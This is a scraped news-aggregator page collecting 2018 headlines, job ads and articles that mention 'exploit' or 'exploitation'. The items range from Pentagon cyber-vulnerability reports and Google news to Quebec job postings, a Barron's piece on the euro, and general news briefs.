              Transport, Propriétaire exploitant - Williams Pharmalogistique - Saguenay, QC      Cache   Translate Page      
    Williams Pharmalogistique est à la recherche d’entrepreneurs en transport ayant les équipements suivants pour les régions de CHICOUTIMI / SAGUENAY:....
    From Indeed - Wed, 08 Aug 2018 14:42:45 GMT - View all Saguenay, QC jobs
              Find Me a 100 Winner: Trust these wind specialists at Walton Heath      Cache   Translate Page      
    Paul Krishnamurty recommends a trio of outsiders and another trio of alternatives who he fancies to exploit conditions in the British Masters at Walton Heath...
              WHY THE EURO WON´T REPLACE THE DOLLAR / BARRON´S MAGAZINE      Cache   Translate Page      

    Why the Euro Won’t Replace the Dollar

    By Matthew C. Klein

    Why the Euro Won’t Replace the Dollar
    Photo: Joel Arbaje



    Europe has a dream that the euro will overtake the U.S. dollar as the world’s reserve currency. It’s an old dream, but it’s based on a misconception.

    In his last State of the Union speech as president of the European Commission, Jean-Claude Juncker pledged “to strengthen the international role of the euro.” Yet the dollar’s preponderance in foreign reserves and in international trade comes from specific properties of the U.S. financial system that most European governments do not want to emulate. Global use of the euro is incompatible with the other priorities of European governments, particularly sovereign debt reduction.

    European complaints about the dollar are not new. The seeds were planted shortly after the D-Day landings, when the Allies agreed at the Bretton Woods Conference to create a postwar monetary regime of fixed exchange rates centered on the dollar. This dollar-based payments system gave Europeans good reason to hold safe dollar-denominated assets they could use to settle debts or pay for imports in emergencies. Those reserve assets lubricated international trade, but they were also debts Americans owed to the rest of the world.

    In the 1950s and 1960s, those debts funded growing financial outflows from the U.S. The U.S. had effectively become the world’s bank, exploiting its overvalued exchange rate to buy long-term risky assets abroad with funds raised from short-term “deposits” sold to foreigners. The French particularly resented what they saw as an “exorbitant privilege” that allowed Americans to buy European assets on the cheap. Europeans eventually responded by converting their dollars into gold bullion at the official U.S. fixed price of $35 an ounce.

    The Nixon administration was unwilling to defend an arbitrary exchange rate by stifling American domestic spending or selling all the Treasury’s bullion. Instead, it officially broke the dollar’s link to gold  in 1971. The supposed privilege had actually been a burden: Foreigners accumulated reserves at the expense of Americans borrowing more and more from the rest of the world. By 1971, those debts had become unpayable—and rather than honor its obligations in gold, the U.S. government effectively defaulted.
    This did not end foreign demand for U.S. financial assets—much to the annoyance of the architects of the euro. The “One Market, One Money” report, published in 1990 by the European Commission, complained that “permanent asymmetries regarding the burden of adjustment have persisted…because of the special international significance of the dollar.” They hoped their new single currency “could finally be a decisive building block for a more stable multi-polar monetary regime.”

    The report’s authors failed to appreciate that the dollar’s “international significance” requires Americans to satisfy foreign demand for dollar-denominated fixed income by increasing their indebtedness. This was demonstrated most clearly in the 2000s. Many emerging markets were traumatized by the crises of the late 1990s and were determined to avoid a repeat. At the same time, oil exporters were enjoying a windfall thanks to soaring prices and wanted to save in preparation for the eventual reversal. The combined effect was a large increase in the demand for safe assets in hard currencies.

    While the U.S. federal government consistently ran budget deficits, the growth in public debt was far too small to satisfy foreign savers. Financial innovations, most notably “private label” mortgage bonds and their derivatives, were therefore needed to bridge the gap between supply and demand. This turned out to be a disaster for both the mortgage borrowers and many of the end investors, but it was the only way to reconcile foreigners’ seemingly insatiable need to hold U.S. bonds with America’s relatively restrictive fiscal policy.

    This unfortunate episode shows why the euro is unlikely to achieve equivalent status to the dollar: Beyond the likely unwillingness of the European private sector to go on a borrowing binge so soon after the financial crisis, there is already an acute shortage of safe euro-denominated assets available. Moreover, this shortage is being made worse by policy.

    In 2007, the governments of the euro area had about €4.8 trillion ($5.6 trillion) in debt securities outstanding. Back then, all of that debt was considered equally “safe” by regulators, monetary policy makers, and—crucially—by investors.

    The total face value of euro-area government bonds has since grown to nearly €8 trillion, but that number needs to be adjusted for credit risk, since the new European consensus is that countries unable to raise funds in the markets will have to default on their obligations. Less than €2 trillion of euro-area sovereign bond debt is issued by AAA-rated borrowers (Germany, Luxembourg, and the Netherlands), and even adding in the relatively safe countries of Austria, Finland, and France only brings the total up to €4.1 trillion. Moreover, the European Central Bank has bought roughly €1.1 trillion of those bonds, shrinking the supply available for investors still further.

    This shortage is being exacerbated by the obsessions of policy makers. A new joint proposal to reform the euro area’s budget rules from France’s Council of Economic Analysis and Germany’s Council of Economic Experts, for example, explicitly says that “a major aim of our proposed rule is to reduce public debt.” The German government has already been paying down its debt for several years, even though an anonymous former International Monetary Fund economist convincingly argues that German government debt “could reasonably—and quite sustainably—approach 240 percent of GDP,” given the country’s high level of domestic savings.

    There is no inherent reason why the euro could not become a credible alternative to the dollar for international payments and reserves. All the Europeans would need to do is replace their national sovereign debts with a single government bond market explicitly backed by the ECB and unconstrained by any fiscal rules. Until they are prepared to do that, however, Juncker’s ambition will remain nothing more than a dream.
              Pentagon slow to protect weapon systems from cyber threats - U.S. agency      Cache   Translate Page      
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

              The incredible Christian love story of King Baudouin and Queen Fabiola...      Cache   Translate Page      
    Throughout the centuries royalty have been at the center of many conflicts over religion, land, and power. There have been some bloodthirsty royals whose exploits have had an impact on society today — just think of Henry VIII with his penchant for killing off wives, and who brought about the English Reformation. However, fortunately...
              Microsoft Patches Windows Zero-Day Exploited by 'FruityArmor' Group      Cache   Translate Page      

    Microsoft's Patch Tuesday updates for October 2018 resolve nearly 50 vulnerabilities, including a Windows zero-day flaw exploited by an advanced persistent threat (APT) actor known as FruityArmor.

    read more


              Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says - NPR      Cache   Translate Page      

    NPR

    Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says
    NPR
    Passwords that took seconds to guess, or were never changed from their factory settings. Cyber vulnerabilities that were known, but never fixed. Those are two common problems plaguing some of the Department of Defense's newest weapons systems, ...
    Watchdog: 'Nearly all' new US weapons systems vulnerable to cyber attacksCNN
    An alarming report shows hackers can break into US weapons systems in less than an hourBusiness Insider
    Weapon Systems Cybersecurity:Government Accountability Office

    all 309 news articles »

              Comment on The Jewish Hand in the World Wars, Part 1, by Thomas Dalton      Cache   Translate Page      
    E=mc² is used to indicate rest energy of a mass, but you will encounter also the equation E_tot=γmc². E_tot (E with subscript tot for total) is the sum of rest energy plus kinetic energy (E_kin or KE) and γ is gamma, the Lorentz factor. γ=1/✓(1–v²/c²), where v is the relative velocity between inertial frames and c is the speed of light in vacuum. So... E_tot = mc² + E_kin = γmc². γ becomes very close to 1 if v is very small compared to c, in which case E_tot is very close to mc². Ron Unz obtained a physics degree iirc, so probably at one time he knew this stuff backwards and forwards, or well enough to pass midterm and final exams of the classes covering postgalilean relativity. Maybe he wouldn't mind exploiting this background by publishing a semirigorous piece on the topic of relativity with a history of its development and some comments about the doubt that Einstein was a prime mover responsible for E=mc².
              Transport, Propriétaire exploitant - Williams Pharmalogistique - Saguenay, QC      Cache   Translate Page      
    Williams Pharmalogistique est à la recherche d’entrepreneurs en transport ayant les équipements suivants pour les régions de CHICOUTIMI / SAGUENAY:....
    From Indeed - Wed, 08 Aug 2018 14:42:45 GMT - View all Saguenay, QC jobs
              How to Use Fail2ban to Secure Your Linux Server      Cache   Translate Page      

    TecMint: By reviewing your server logs, you may often find different attempts for brute force login, web floods, exploit seeking and many others.


              Superviseur Centrale de réservation hôtelière H/F      Cache   Translate Page      
    Depuis 1989, le Groupe RESIDE ETUDES conçoit et exploite des résidences avec services, se &hellip;
              Titre Associé aux Ventes Sans-Fil - Sept Iles - OSL Retail Services Inc - Sept-Îles, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Mon, 24 Sep 2018 13:21:37 GMT - View all Sept-Îles, QC jobs
              Titre Associé aux Ventes Sans-Fil - Alma - OSL Retail Services Inc - Alma, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Fri, 06 Jul 2018 01:21:59 GMT - View all Alma, QC jobs
              Titre Associé aux Ventes Sans-Fil - Val D'Or - OSL Retail Services Inc - Val-d'Or, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 20 Sep 2018 01:20:16 GMT - View all Val-d'Or, QC jobs
              Titre Gérant de Magasin Sans-Fil - OSL Retail Services Inc - Québec City, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
    From OSL Retail Services Inc - Mon, 17 Sep 2018 19:20:40 GMT - View all Québec City, QC jobs
              Titre Associé aux Ventes Sans-Fil - Levis - OSL Retail Services Inc - Lévis, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 04 Oct 2018 19:19:16 GMT - View all Lévis, QC jobs
              Titre Associé aux Ventes Sans-Fil - Victoriaville - OSL Retail Services Inc - Victoriaville, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Wed, 03 Oct 2018 13:20:36 GMT - View all Victoriaville, QC jobs
              Titre Associé aux Ventes Sans-Fil - Ste-Agathe des Monts - OSL Retail Services Inc - Sainte-Agathe-des-Monts, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Wed, 22 Aug 2018 19:20:44 GMT - View all Sainte-Agathe-des-Monts, QC jobs
              Titre Gérant de Magasin Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Chez OSL, nous savons comment récompenser nos employés. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:20:02 GMT - View all Joliette, QC jobs
              Titre Associé aux Ventes Sans-Fil - Joliette - OSL Retail Services Inc - Joliette, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:19:46 GMT - View all Joliette, QC jobs
              Titre Associé aux Ventes Sans-Fil - Drummondville - OSL Retail Services Inc - Drummondville, QC      Cache   Translate Page      
    Alors OSL est fait pour vous. Walmart Canada s'est associé à OSL pour exploiter ses 350 magasins sans-fil à travers le Canada et nous sommes en pleine...
    From OSL Retail Services Inc - Thu, 12 Jul 2018 01:18:36 GMT - View all Drummondville, QC jobs
              Google fait appel de l'amende record de 4,3 milliards d'euros pour Android (porte-parole)      Cache   Translate Page      
    Bruxelles - Google a fait appel mardi de l'amende record de 4,34 milliards d'euros qui lui avait été infligée en juillet par l'UE pour position dominante de son système d'exploitation pour smartphones Android, a annoncé le groupe...
              Busy Philipps Accuses James Franco of Assaulting Her on Set      Cache   Translate Page      
    televisionArts & Entertainment, television, Crime, James Franco, Ellen DeGeneres

    The actress becomes the sixth woman to accuse Franco of misconduct or exploitation.

    CrimeJames FrancoEllen DeGeneresbusyphillips-jamesfranco750x422.jpgAriel Sobel

    In her upcoming memoir, actress Busy Philipps accuses Freaks and Geeks costar James Franco of physically assaulting her on set.

    A passage from This Will Only Hurt a Little, which was obtained by Radar Online, then verified by other publications, details how in 1999 Philipps was directed to hit Franco lightly on the chest during a scene. Afterward, Franco stopped acting.

    "He grabbed both my arms and screamed in my face, 'DON'T EVER TOUCH ME AGAIN!'" Philipps recalls. "And he threw me to the ground. Flat on my back. Wind knocked out of me."

    Franco then stormed off while the crew ran over to help her back to her feet, according to Philipps. He apologized to her the next day after being told to do so by the director and producers, but he was never punished for his action, she writes.

    Franco's representatives did not respond to a request for comment from Variety.

    Earlier this year, when Franco was the front-runner for the Best Actor Oscar for his performance in The Disaster Artist, five women came forward to accuse him of inappropriate behavior and exploitation on and off set. One woman, Violet Paley, tweeted that Franco forced her head toward his exposed penis in a car, and also said he preyed on her underage friend. Sarah Tither-Kaplan claimed that Franco said she was contractually obligated to be fully nude on set for $100 per day.

     

    Days after posing with a "Time's Up" pin at the Golden Globes, where he took home an award, Franco denied the allegations on The Late Show With Stephen Colbert.

    “The things that I heard that were on Twitter are not accurate, but I completely support people coming out and being able to have a voice because they didn’t have a voice for so long,” Franco told the host. 

    In her book, Philipps calls Franco a "fucking bully." She had previously discussed the alleged assault in a 2016 appearance on Watch What Happens Live, where she noted that she and Franco "really, really disliked each other" during the run of Freaks and Geeks but had later made amends.

    "He felt like he wanted his character to be one way. He had had a discussion with the producers that he came from an abused family or something, and so he didn't want his girlfriend — I played his girlfriend — to ever physically hit him," Philipps said on the late-night show. "I never knew this conversation existed, and in an improv, I smacked him on the thing, and he was like, 'Don't ever touch me,' and grabbed me and shoved me to the ground. It was an overreaction by a 19-year-old dude. And it was weird and people's agents had to be called and he had to apologize to me."

    While promoting her book, Philipps also opened up on The Ellen DeGeneres Show about being raped at 14. In the same episode, host DeGeneres discussed her own experience of being molested when she was 15.

    This Will Only Hurt a Little goes on sale October 16.

    00
              Analyste de la flotte minière - Toromont Cat (Québec) - Val-d'Or, QC      Cache   Translate Page      
    Offrir des recommandations pour réduire les coûts d'exploitation de l'équipement Caterpillar de notre client....
    From Toromont - Fri, 28 Sep 2018 16:42:57 GMT - View all Val-d'Or, QC jobs
              L’iOS 11 n’est plus, Apple ne le signe plus      Cache   Translate Page      

    L'iOS 11 n'est plus, Apple ne le signe plus

    Hier soir, à 19 heures en France, Apple a créé la surprise en proposant au téléchargement l’iOS 12.0.1. Ce dernier vient contenter énormément de monde puisqu’il corrige les quelques bugs de l’iOS 12, notamment les problèmes de WiFi et de recharge. Mais l’arrivée d’une nouvelle version du système d’exploitation des appareils mobiles de la firme […]
              Turkey 'Saber-Rattling' on US-Backed Militia in Syria      Cache   Translate Page      
    Turkey is threatening to eradicate the People's Protection Units (YPG) militia in Syria. But such a move would put it on a collision course with the United States, which backs the Syrian Kurdish group as a key ally in the war against Islamic State and curtailing Iran's influence. President Recep Tayyip Erdogan said Turkey's army will sweep the YPG from its border. Ankara claims the militia is linked to the Kurdistan Workers' Party, (PKK), which is waging a decades-long insurgency for Kurdish autonomy in Turkey. In an address to parliament last week, Erdogan vowed the destruction of the YPG, and slammed Washington for its armed support of the group. "The United States has sent nearly 19,000 trucks [loaded with arms] to the YPG and PYD [Democratic Union Party] in northern Syria," Erdogan said. "Who will they use these arms against? We demanded to buy weapons from you, and you rejected [that]. However, you are giving those arms to terrorist groups." The YPG, with U.S. military backing, seized control of a broad swath of Syrian territory that runs east of Syria's Euphrates River to the Iraqi frontier. The region borders Turkey, and Ankara claims YPG control of this territory is an intolerable security threat. Turkey's forces have been steadily building up a presence close to strategic YPG towns. Its hardening rhetoric coincides with the U.S. indicating it will remain in Syria after IS is defeated. "We're not going to leave as long as Iranian troops are outside Iranian borders, and that includes Iranian proxies and militias," White House National Security Advisor John Bolton said at last month's U.N. General Assembly. Former senior Turkish diplomat Aydin Selcen, who served in Washington and in the region, said he believes the YPG has become key to U.S. objectives in the area. "Now, the U.S.' main struggle in the region is with Iran," Selcen said. "And this particular triangle region to the east of the Euphrates is of high importance when it comes to stopping Iranian presence in the Middle East. I don't see how the U.S. can do anything about the YPG presence east of the Euphrates near the Turkish border." He added that pushing the militia away from the Turkish border also is not viable. "All the towns [under YPG control] are aligned along the Turkish border," he said  "So you cannot ask the YPG to leave those towns, as they will have to go to the desert areas, which is not feasible." Iran and Russia have been quick to exploit the apparent standoff between Turkey and the U.S. Last month, Russian Foreign Minister Sergei Lavrov said, "The main danger to Syria's territorial integrity originates from the eastern bank of the Euphrates, where independent and autonomous structures are created under the direct control of the United States." Analysts say Iran and Russia share Turkey's concern over U.S. backing of the YPG. And they suggest a decision by the group's political wing, the PYD, earlier this month to end talks with Damascus likely was influenced by Washington's renewed commitment to remain in Syria. While backing rival sides in the Syrian civil war, Turkey has found common ground with Iran and Russia to resolve the conflict. At the same time, Moscow and Tehran are widely seen to be using that cooperation to try and draw Ankara away from Washington. Turkey already controls a large swath of Syrian territory from previous military operations against the YPG. But analysts suggest the Syrian government, Iran and Russia would likely hesitate to support the Turkish army further extending its control of Syria, even if it meant ousting U.S. forces. Saber rattling Despite Turkey's heightened rhetoric and military presence on the Syria border, there is a suspicion it remains just saber rattling. "There was an increase in forces from the Turkish side near Tel Abyad [a YPG-controlled Syrian town] and what Mr. Erdogan said any military operation could be imminent in the east of the Euphrates," Selcen said. "To me, this was not very probable because it would bring two NATO members — Turkey and the U.S. — face to face in Syria." The threat of military action could be just leverage on the U.S., sharply criticized by Turkey for its slow response to enforcing an agreed road map for the YPG to withdraw from the strategic Syrian city of Manbij. "Manbij remains an open wound in Turkish-U.S. relations," said international relations expert Soli Ozel of Istanbul's Kadir Has University. "The previous U.S. administration promised Ankara YPG forces would leave the city after its capture from Islamic State, a commitment it failed to honor." In a move that could dial down tensions, Turkey's Defense Minister Hulusi Akar announced this week that joint patrols by Turkish and U.S. forces would start in Manbij. Erdogan had accused Washington of foot-dragging in honoring a commitment to begin the patrols,seen by Turkey as an essential step toward removing the YPG from Manbij. Despite Turkey's fiery rhetoric, analysts say cooperation with the U.S. is continuing in Syria, and as a senior Western diplomat pointed out, Turkey continues to accommodate U.S. forces' heavy reliance on its critical Incirlik airbase for Syrian operations.
              Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

              Contremaître(sse), EVF - ArcelorMittal Exploitation minière Canada s.e.n.c. - Port-Cartier, QC      Cache   Translate Page      
    Il fait la gestion de la flotte d'équipements à l'EVF, ce qui inclus les mouvements entre le Port, le garage et les différentes équipes le long de la voie;...
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Fri, 05 Oct 2018 20:47:03 GMT - View all Port-Cartier, QC jobs
              The daily business briefing: October 9, 2018       Cache   Translate Page      

    1.

    Google parent Alphabet is shutting down its Google+ social network to consumers after data from up to 500,000 users appeared to have been exposed to external developers due to a bug, the company announced in a blog on Monday. Google said it detected the problem and patched the leak in March. The company also said there was no evidence that any developers misused user data or exploited the vulnerability. Still, shares of Alphabet dropped by more than 1 percent on the news of the latest privacy glitch to affect a major tech company. The company reportedly plans to "wind down" Google+, which has "very low usage" among consumers anyway, by August 2019. It will be kept alive for businesses. [Reuters]

    2.

    New Fox, the successor to Fox News parent company 21st Century Fox, on Monday named President Trump's former White House communications director, Hope Hicks, as its head of corporate communications. Hicks, 29, will run communications for a company overseeing Fox News, the Fox broadcasting network, and other outlets under the control of Rupert Murdoch. Hicks' hiring is the latest in a series of moves linking Fox News personnel and the White House. Bill Shine, the network's former co-president, became White House deputy chief of staff for communications, effectively replacing Hicks. New Fox is the company emerging from 21st Century Fox's sale of many assets to Walt Disney Co. [The Washington Post]

    3.

    President Trump plans Tuesday to issue a directive allowing the year-round sale of gasoline containing more ethanol, up to 15 percent, in a move to keep a campaign promise to farmers, The Wall Street Journal reported, citing a senior White House official. Gasoline with 15 percent ethanol, known as E15, currently is banned in summer to cut smog. The change is intended to help expand the use of biofuels, but could escalate tensions with the oil industry. As a concession, Trump also is expected to propose changes to a program letting oil refiners buy and sell credits for using ethanol. After the announcement, Trump will travel to leading corn and ethanol producing state Iowa for a political rally, the White House official said. [The Wall Street Journal, MarketWatch]

    4.

    Alphabet's Google on Tuesday is unveiling the third edition of its Pixel smartphone. The company is holding 10 media events across the world in a sign that it will expand distribution of the devices in a bid to take on Apple's popular iPhone. Most of the world's smartphones operate on Google's free Android software, and the company has been pushing into the hardware business over the last three years hoping to increase its control over revenue from its apps. Google has been successful selling lower-priced smart speakers, but it shipped just 2.5 million Pixel 2 and 2 XL devices in the nine months that ended on June 30, giving it less than 1 percent of the global smartphone market. [Reuters]

    5.

    The International Monetary Fund on Monday downgraded its outlook for the world economy due to rising interest rates and trade tensions. The IMF forecast 3.7 percent growth for the global economy in 2018, down from a July estimate of 3.9 percent growth. European and Asian stocks were mixed on Tuesday after the news. In the U.S., stock-index futures edged down. Futures for the Dow Jones Industrial Average dropped by 0.2 percent early Tuesday, while those of the S&P 500 were down by 0.3 percent. U.S. stocks pared early losses on Monday, with the Dow eking out a narrow gain and the S&P 500 closing nearly flat, while the Nasdaq Composite fell by 0.7 percent. [The Associated Press]


              10 things you need to know today: October 9, 2018       Cache   Translate Page      

    1.

    President Trump used a White House ceremonial swearing-in for Supreme Court Justice Brett Kavanaugh to further politicize the judge's confirmation by calling allegations of sexual misconduct against him "a campaign of political and personal destruction based on lies and deception." Trump apologized to Kavanaugh "on behalf of our nation" for what he earlier called a "hoax" orchestrated by Democrats. He declared that Kavanaugh had been "proven innocent" in an investigation, although it reached no conclusions. Kavanaugh, whose confirmation faced intense protests, sought to ease partisan tensions by promising to "take this office with gratitude and no bitterness," saying the confirmation battle "did not change me." "My approach to judging remains the same: A good judge must be an umpire, a neutral and impartial decider that favors no litigant or policy," he said. [The Washington Post]

    2.

    Hurricane Michael continued intensifying on Monday and early Tuesday, with forecasters warning it could grow into a "potentially catastrophic storm" more powerful than previously thought before making landfall in the Florida Panhandle on Wednesday. The storm reached hurricane status on Monday after its top sustained winds went from 35 miles per hour to 75 mph over 24 hours. Its top winds reached 90 mph early Tuesday. The National Hurricane Center warned Michael could make landfall as a major hurricane — a Category 3 with top sustained winds of roughly 120 mph. Florida Gov. Rick Scott (R) ordered thousands of coastal residents to head inland and others to prepare to evacuate as forecasters issued a hurricane warning for the northeastern Gulf Coast from the Alabama-Florida border to Suwanee River, Florida. [USA Today]

    3.

    Newly confirmed Supreme Court Justice Brett Kavanaugh joins the other eight members of the high court on Tuesday to hear his first arguments as a justice. The confirmation of Kavanaugh, who is considered reliably conservative, to replace retired moderate conservative Anthony Kennedy, caps a decades-long push by Republicans to secure a solidly conservative 5-4 majority on the Supreme Court. Court watchers will be looking at any questions Kavanaugh may ask, seeking indications of how his presence will shift the balance on the court. Kavanaugh missed the first week of the court's new session due to a hearing and FBI investigation on sexual misconduct allegations against him. He was confirmed Saturday in a 50-48 vote, the narrowest confirmation of a justice since 1881. [The Associated Press]

    4.

    President Trump said Monday that he has no plans to fire Deputy Attorney General Rod Rosenstein, batting down for the time being any speculation that he intended to get rid of the official overseeing Special Counsel Robert Mueller's investigation into Russia's election meddling and possible collusion by Trump campaign associates. Rumors that Rosenstein would quit or be fired began circulating after reports that he had suggested last year secretly recording conversations with Trump, and invoking the 25th Amendment to remove Trump from office. After talking with Rosenstein for about half an hour aboard Air Force One, Trump said the two had a "very good talk" and got along "very well." [USA Today]

    5.

    Turkish President Recep Tayyip Erdogan on Monday demanded that Saudi Arabia provide proof that missing self-exiled Saudi journalist Jamal Khashoggi left the Saudi consulate in Istanbul on his own. Khashoggi went into the consulate on Friday to pick up a document that would have permitted him to remarry the next day, but he hasn't been seen since. Erdogan's statement marked an escalation in diplomatic tensions between Turkey and Saudi Arabia over the case. Turkish officials say they believe Saudi agents killed Khashoggi inside the consulate. "Do you not have cameras and everything of the sort?" Erdogan said, directing his question to Saudi officials. "They have all of them. Then why do you not prove this? You need to prove it." [The Washington Post]

    6.

    New Fox, the successor to Fox News parent company 21st Century Fox, on Monday named President Trump's former White House communications director, Hope Hicks, as its head of corporate communications. Hicks, 29, will run communications for a company overseeing Fox News, the Fox broadcasting network, and other outlets under the control of Rupert Murdoch. Hicks' hiring is the latest in a series of moves linking Fox News personnel and the White House. Bill Shine, the network's former co-president, became White House deputy chief of staff for communications, effectively replacing Hicks. New Fox is the company emerging from 21st Century Fox's sale of many assets to Walt Disney Co. [The Washington Post]

    7.

    Google is shutting down its Google+ social network to consumers after data from up to 500,000 users appeared to have been exposed to external developers due to a bug, the company announced in a blog on Monday. Google said it detected the problem and patched the leak in March. The company also said there was no evidence that any developers misused user data or exploited the vulnerability. Still, shares of Google parent Alphabet dropped by more than 1 percent on the news of the latest privacy glitch to affect a major tech company. The company reportedly plans to "wind down" Google+, which has "very low usage" among consumers anyway, by August 2019. It will be kept alive for businesses. [Reuters]

    8.

    The limousine that crashed in upstate New York over the weekend, killing 20 people, failed an inspection last month, and the driver lacked the license he needed to legally operate the vehicle, New York Gov. Andrew Cuomo (D) said Monday. An aunt of one of the victims said she texted concerns about the "terrible condition" of the limousine less than 20 minutes before it sped through an intersection, struck and killed two pedestrians, and slammed into a parked vehicle. All 18 people in the limo were killed. It was taking them to a birthday celebration. [USA Today]

    9.

    The death toll from the 5.9-magnitude earthquake that hit northwestern Haiti over the weekend rose to at least 15 people on Monday, according to updated official figures. Another 333 people were reported injured. Thousands of people in the region's biggest city, Port-de-Paix, dragged mattresses out of their homes and slept outside after the quake and a 5.2-magnitude aftershock stoked panic in a country still traumatized by a deadly 7.2-magnitude earthquake that devastated the Caribbean nation's capital, Port-au-Prince, and nearby cities in 2010. Port-de-Paix is about 10 miles from the Saturday earthquake's epicenter. Many people in the city were afraid to return to cinderblock homes cracked by the temblors. [The Associated Press]

    10.

    Bulgarian authorities are investigating whether the rape and murder of Viktoria Marinova, a 30-year-old Bulgarian journalist, was related to her work. Marinova, who was killed Saturday in the northeastern city of Ruse, recently had become the anchor of a talk show focused on investigative reporting. She was the third reporter killed in Europe over the last year. The European Union promised to support the investigation by Bulgarian authorities. Bulgarian Interior Minister Mladen Marinov said, however, that there was no evidence yet that Marinova was killed over her work. Bulgarian national radio reported that a suspect had been arrested in connection with the slaying. [The Washington Post, The Associated Press]


              Stagiaire en génie informatique- Analyste-Programmeur - Rio Tinto - Saguenay, QC      Cache   Translate Page      
    Stagiaire en génie informatique- Analyste-Programmeur · Excellente opportunité de rejoindre une organisation mondiale à l’avant-garde de l’exploitation...
    From Rio Tinto - Fri, 21 Sep 2018 10:59:14 GMT - View all Saguenay, QC jobs
              China remains the world's biggest greenhouse gas emitter, while Australia ranks as 13th biggest emitter.      Cache   Translate Page      

    Australia defies climate warning to back coal

    • 9 October 2018
    Truck being loaded with coal in AustraliaImage copyrightGETTY IMAGES
    Image captionCoal provides about 60% of Australia's electricity
    The Australian government has backed coal-fired power, despite the recommendations of a major report on climate change.
    Phasing out coal is considered crucial to limiting global warming to within 1.5C, as set out in the UN report released yesterday.
    Australia's deputy prime minister has said the country should "absolutely" continue to use and exploit its coal.
    But China remains the world's biggest coal consumer.
    The Guardian reports that Michael McCormack, Australia's Deputy PM, said his government would not change policy "just because somebody might suggest that some sort of report is the way we need to follow and everything that we should do".
    He added that coal provided 60% of Australia's electricity, 50,000 jobs and was the country's biggest export.
    Graphic showing what is likely to be affected by different rises in temperature
    Australia's Environment Minister Melissa Price told ABC radio that the IPCC was "drawing a long bow" by calling for an end to coal by 2050, and touted new technologies as a way of saving the polluting fuel.
    The climate report was produced by the UN's Intergovernmental Panel on Climate Change (IPCC). It warned that "unprecedented" changes would be required to limit the Earth's temperature rise, and predicted that catastrophic species loss and extreme weather would result if the target was exceeded.
    It said that coal-fired power generation had to end by 2050 in order to avoid devastating changes to the planet.
    The coal lobby is pushing a technology known as carbon capture and storage (CCS) as a solution. CCS involved capturing CO2 produced through the burning of fossil fuels like coal and trapping it deep in the ground.
    The IPCC agrees that CCS must become widespread. But many analysts say that progress on the technology is too slow to allow the necessary emissions reduction goals to be achieved. 
    In addition, renewable energy technologies are becoming cheaper than conventional coal-fired power generation - a trend that's likely to continue.
    Meanwhile, China is reported to possess some 993 gigawatts of coal power capacity, although the approved new plants would increase this by 25%.
    China's central government has tried to rein in this boom by issuing suspension orders for more than 100 power plants. But the report based on satellite imagery suggests that these efforts have not been totally effective.
    China remains the world's biggest greenhouse gas emitter, while Australia ranks as 13th biggest emitter.

              An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider      Cache   Translate Page      

    Business Insider

    An alarming report shows hackers can break into US weapons systems in less than an hour
    Business Insider
    A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...
    Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to actTechCrunch

    all 307 news articles »

              Machiniste - Groupe SFP ressources humaines - Fermont, QC      Cache   Translate Page      
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* est le numéro un mondial de l’exploitation sidérurgique et minière et compte plus de 220 000 employés... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
              US slow to protect itself from cyberattack - report      Cache   Translate Page      
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
              Amende record de 4,34 milliards d’euros pour Android : Google décide de faire appel      Cache   Translate Page      
    En juillet dernier, Google a écopé d’une amende record de 4,34 milliards d’euros en Europe au sujet d’Android. Le groupe était accusé d’abus de position dominante avec son système d’exploitation mobile et plus particulièrement des services inclus. Trois mois plus tard, Google annonce avoir fait appel devant le …

    Lire la suite

    Aimez KultureGeek sur Facebook, et suivez-nous sur Twitter



              Gillian Anderson backs calls for ‘huge’ Antarctic wildlife sanctuary      Cache   Translate Page      

